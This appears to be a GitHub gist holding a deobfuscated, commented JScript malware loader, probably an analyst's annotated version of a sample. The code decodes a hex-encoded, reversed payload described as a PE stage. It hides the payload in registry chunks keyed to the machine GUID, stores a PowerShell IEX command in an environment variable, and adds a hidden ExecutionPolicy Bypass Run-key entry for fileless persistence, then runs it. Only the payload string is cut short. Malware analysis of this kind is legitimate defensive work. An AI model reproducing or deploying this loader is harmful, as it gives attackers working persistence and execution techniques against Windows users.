Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
<#
Obfuscated payload (the next stage, containing the PE):
#>
var obf_data1 = 'B323232323230237D202075656C635D2[...]';
<#
initialize:
#>
shell_app = WScript.CreateObject("shell.application");
fs_obj = new ActiveXObject("Scripting.FileSystemObject");
<#
decode the obfuscated content:
#>
var stage2 = obf_data1.split("").reverse().join("");
stage3 = '';
for (i = 0; i < (stage2.length / 2); i++) {
stage3 += String.fromCharCode('0x' + stage2.substr(i * 2, 2));
}
var shell_obj = WScript.CreateObject("WScript.Shell");
<#
create the name of the key based on the Machine Guid:
#>
machine_guid = shell_obj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid");
var pattern = /\-|[0-9]/g;
machine_guid = "A" + machine_guid.replace(pattern, "");
my_key = machine_guid.toLowerCase();
is_fresh = 0;
<#
check if the key already exist:
#>
try {
shell_obj.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\");
} catch (err) {
is_fresh = 1;
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\", "", "REG_SZ");
}
if (is_fresh == 1) {
<#
Divide the content on chunks and store it in form of registry keys:
#>
chunk = '';
counter = 0;
for (var i = 0; i <= stage3.length - 1; i++) {
chunk = chunk + stage3.substring(i, i + 1);
if (chunk.length == 4000) {
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
counter = counter + 1;
chunk = '';
}
}
<#
Write the last chunk:
#>
if (chunk.length > 0) {
counter = counter + 1;
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
}
<#
Fetch the PowerShell path:
#>
if (fs_obj.FolderExists("C:\\Program Files (x86)")) {
var powershell_path = 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe';
} else {
var powershell_path = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
}
<#
Save the command for reading the saved keys one by one:
#>
ps_cmd1 = 'for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path \'HKCU:\\SOFTWARE\\' + my_key + '\').$i}Catch{}}IEX($abc)';
shell_obj.RegWrite("HKEY_CURRENT_USER\\Environment\\" + my_key, ps_cmd1, "REG_EXPAND_SZ");
ps_cmd2 = '-ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable(\'' + my_key + '\', \'User\'))"';
<#
Add the Run key for (fileless) persistence:
#>
shell_obj.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + my_key, powershell_path + ' ' + ps_cmd2, "REG_SZ");
<#
Run the same powershell command immediately (as in the case of persistence):
#>
shell_app.ShellExecute(powershell_path, ps_cmd2, "", "open", 0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment